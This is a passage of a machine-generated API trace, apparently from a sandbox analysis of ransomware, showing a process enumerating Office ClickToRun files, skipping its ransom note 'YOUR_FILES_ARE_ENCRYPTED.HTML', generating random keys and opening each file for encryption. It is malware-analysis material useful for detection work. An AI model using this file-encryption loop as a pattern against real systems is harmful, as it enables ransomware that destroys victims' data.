dwCompletionKey=0x758a6c0, lpOverlapped=0x758a6c0) returned 1 [0156.233] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92db1230, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92db1230, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x77552c30, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0xadce8, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml", cAlternateFileName="C280EB~1.XML")) returned 1 [0156.233] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml") returned 137 [0156.233] lstrcmpW (lpString1="C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.233] PathFindExtensionW (pszPath="C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml") returned=".xml" [0156.233] lstrlenW (lpString=".xml") returned 4 [0156.233] PathFindExtensionW (pszPath="C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml") returned=".xml" [0156.233] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0156.233] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.powerpivot.powerpivot.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b4 [0156.234] GetFileSizeEx (in: hFile=0x5b4, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=711912) returned 1 [0156.234] GetProcessHeap () returned 0x270000 [0156.234] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x75e0048 [0156.238] lstrcpyW (in: lpString1=0x75f00fc, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml" [0156.238] CreateIoCompletionPort (FileHandle=0x5b4, ExistingCompletionPort=0x3a0, CompletionKey=0x75e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0156.238] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x75e0048, lpOverlapped=0x75e0048) returned 1 [0156.238] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92d3ee10, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92d3ee10, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x77494550, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x19170, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml", cAlternateFileName="C222CA~1.XML")) returned 1 [0156.238] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml") returned 137 [0156.238] lstrcmpW (lpString1="C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.238] PathFindExtensionW (pszPath="C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml") returned=".xml" [0156.238] lstrlenW (lpString=".xml") returned 4 [0156.238] PathFindExtensionW (pszPath="C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml") returned=".xml" [0156.238] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0156.239] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.powerpoint.powerpoint.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x590 [0156.424] GetFileSizeEx (in: hFile=0x590, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=102768) returned 1 [0156.424] GetProcessHeap () returned 0x270000 [0156.425] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0156.428] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml" [0156.428] CreateIoCompletionPort (FileHandle=0x590, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0156.428] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0156.429] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92d18cb0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92d18cb0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x77d5b670, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x684e, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="C2RManifest.powerpointmui.msi.16.en-us.xml", cAlternateFileName="C27FF4~1.XML")) returned 1 [0156.429] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.powerpointmui.msi.16.en-us.xml") returned 121 [0156.429] lstrcmpW (lpString1="C2RManifest.powerpointmui.msi.16.en-us.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.429] PathFindExtensionW (pszPath="C2RManifest.powerpointmui.msi.16.en-us.xml") returned=".xml" [0156.429] lstrlenW (lpString=".xml") returned 4 [0156.429] PathFindExtensionW (pszPath="C2RManifest.powerpointmui.msi.16.en-us.xml") returned=".xml" [0156.431] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0156.431] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.powerpointmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.powerpointmui.msi.16.en-us.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0156.431] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=26702) returned 1 [0156.431] GetProcessHeap () returned 0x270000 [0156.431] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x75e0048 [0156.446] lstrcpyW (in: lpString1=0x75f00fc, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.powerpointmui.msi.16.en-us.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.powerpointmui.msi.16.en-us.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.powerpointmui.msi.16.en-us.xml" [0156.446] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x75e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0156.446] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x75e0048, lpOverlapped=0x75e0048) returned 1 [0156.449] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92d18cb0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92d18cb0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x77fbcc70, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x636e, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="C2RManifest.Proof.Culture.msi.16.en-us.xml", cAlternateFileName="C2B3EB~1.XML")) returned 1 [0156.449] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.en-us.xml") returned 121 [0156.449] lstrcmpW (lpString1="C2RManifest.Proof.Culture.msi.16.en-us.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.451] PathFindExtensionW (pszPath="C2RManifest.Proof.Culture.msi.16.en-us.xml") returned=".xml" [0156.451] lstrlenW (lpString=".xml") returned 4 [0156.451] PathFindExtensionW (pszPath="C2RManifest.Proof.Culture.msi.16.en-us.xml") returned=".xml" [0156.451] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0156.451] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proof.culture.msi.16.en-us.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x590 [0156.454] GetFileSizeEx (in: hFile=0x590, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=25454) returned 1 [0156.454] GetProcessHeap () returned 0x270000 [0156.454] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0156.455] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="B9") returned 2 [0156.455] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="8D") returned 2 [0156.455] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="E1") returned 2 [0156.455] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="4D") returned 2 [0156.455] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="AD") returned 2 [0156.455] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="A0") returned 2 [0156.455] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="FB") returned 2 [0156.455] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="24") returned 2 [0156.455] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="8C") returned 2 [0156.455] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="2D") returned 2 [0156.455] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="77") returned 2 [0156.455] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="D7") returned 2 [0156.455] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="C5") returned 2 [0156.455] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="5C") returned 2 [0156.455] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="3F") returned 2 [0156.455] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="18") returned 2 [0156.455] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="4C") returned 2 [0156.455] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="DB") returned 2 [0156.455] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="A8") returned 2 [0156.455] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="3B") returned 2 [0156.455] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="55") returned 2 [0156.455] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="40") returned 2 [0156.455] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="A5") returned 2 [0156.455] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="71") returned 2 [0156.455] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="FE") returned 2 [0156.455] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="29") returned 2 [0156.455] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="C1") returned 2 [0156.455] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="7F") returned 2 [0156.455] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="D6") returned 2 [0156.456] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="13") returned 2 [0156.456] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="2C") returned 2 [0156.456] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="00") returned 2 [0156.456] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.en-us.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.en-us.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.en-us.xml" [0156.456] CreateIoCompletionPort (FileHandle=0x590, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0156.456] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0156.456] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92d18cb0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92d18cb0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x77fe2dd0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x5fa6, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="C2RManifest.Proof.Culture.msi.16.es-es.xml", cAlternateFileName="C23127~1.XML")) returned 1 [0156.456] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.es-es.xml") returned 121 [0156.456] lstrcmpW (lpString1="C2RManifest.Proof.Culture.msi.16.es-es.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.456] PathFindExtensionW (pszPath="C2RManifest.Proof.Culture.msi.16.es-es.xml") returned=".xml" [0156.456] lstrlenW (lpString=".xml") returned 4 [0156.456] PathFindExtensionW (pszPath="C2RManifest.Proof.Culture.msi.16.es-es.xml") returned=".xml" [0156.456] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0156.457] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.es-es.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proof.culture.msi.16.es-es.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a8 [0156.457] GetFileSizeEx (in: hFile=0x5a8, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=24486) returned 1 [0156.457] GetProcessHeap () returned 0x270000 [0156.458] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7422068 [0156.462] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="53") returned 2 [0156.463] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="CD") returned 2 [0156.463] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="91") returned 2 [0156.463] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="DA") returned 2 [0156.463] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="EE") returned 2 [0156.463] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="D7") returned 2 [0156.463] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="7D") returned 2 [0156.463] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="0C") returned 2 [0156.463] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="28") returned 2 [0156.463] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="DD") returned 2 [0156.463] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="BD") returned 2 [0156.463] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="58") returned 2 [0156.463] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="BE") returned 2 [0156.463] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="6C") returned 2 [0156.463] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="1D") returned 2 [0156.463] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="88") returned 2 [0156.463] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="E9") returned 2 [0156.463] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="C3") returned 2 [0156.463] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="CB") returned 2 [0156.463] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="AA") returned 2 [0156.463] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="F4") returned 2 [0156.463] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="E1") returned 2 [0156.463] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="2C") returned 2 [0156.463] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="7A") returned 2 [0156.463] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="A1") returned 2 [0156.463] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="A1") returned 2 [0156.463] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="96") returned 2 [0156.463] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="A8") returned 2 [0156.463] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="D5") returned 2 [0156.463] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="B6") returned 2 [0156.464] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="CF") returned 2 [0156.464] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="76") returned 2 [0156.464] lstrcpyW (in: lpString1=0x743211c, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.es-es.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.es-es.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.es-es.xml" [0156.464] CreateIoCompletionPort (FileHandle=0x5a8, ExistingCompletionPort=0x3a0, CompletionKey=0x7422068, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0156.464] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7422068, lpOverlapped=0x7422068) returned 1 [0156.464] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92d18cb0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92d18cb0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x77f709b0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x5fa6, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="C2RManifest.Proof.Culture.msi.16.fr-fr.xml", cAlternateFileName="C2BAB3~1.XML")) returned 1 [0156.464] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.fr-fr.xml") returned 121 [0156.464] lstrcmpW (lpString1="C2RManifest.Proof.Culture.msi.16.fr-fr.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.465] PathFindExtensionW (pszPath="C2RManifest.Proof.Culture.msi.16.fr-fr.xml") returned=".xml" [0156.465] lstrlenW (lpString=".xml") returned 4 [0156.465] PathFindExtensionW (pszPath="C2RManifest.Proof.Culture.msi.16.fr-fr.xml") returned=".xml" [0156.465] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0156.465] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.fr-fr.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proof.culture.msi.16.fr-fr.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a4 [0156.465] GetFileSizeEx (in: hFile=0x5a4, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=24486) returned 1 [0156.465] GetProcessHeap () returned 0x270000 [0156.465] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x744a1c0 [0156.467] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="CF") returned 2 [0156.467] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="B4") returned 2 [0156.467] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="B3") returned 2 [0156.468] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="B1") returned 2 [0156.468] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="4D") returned 2 [0156.468] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="CD") returned 2 [0156.468] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="9A") returned 2 [0156.468] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="C2") returned 2 [0156.468] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="D0") returned 2 [0156.468] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="31") returned 2 [0156.468] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="BB") returned 2 [0156.468] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="88") returned 2 [0156.468] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="12") returned 2 [0156.468] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="9D") returned 2 [0156.468] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="21") returned 2 [0156.468] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="4A") returned 2 [0156.468] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="1C") returned 2 [0156.468] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="78") returned 2 [0156.468] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="68") returned 2 [0156.468] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="1E") returned 2 [0156.468] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="56") returned 2 [0156.468] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="02") returned 2 [0156.468] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="8B") returned 2 [0156.468] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="5E") returned 2 [0156.468] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="F9") returned 2 [0156.468] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="8C") returned 2 [0156.468] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="3A") returned 2 [0156.468] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="12") returned 2 [0156.468] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="B2") returned 2 [0156.468] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="9E") returned 2 [0156.468] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="1C") returned 2 [0156.468] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="1A") returned 2 [0156.469] lstrcpyW (in: lpString1=0x745a274, 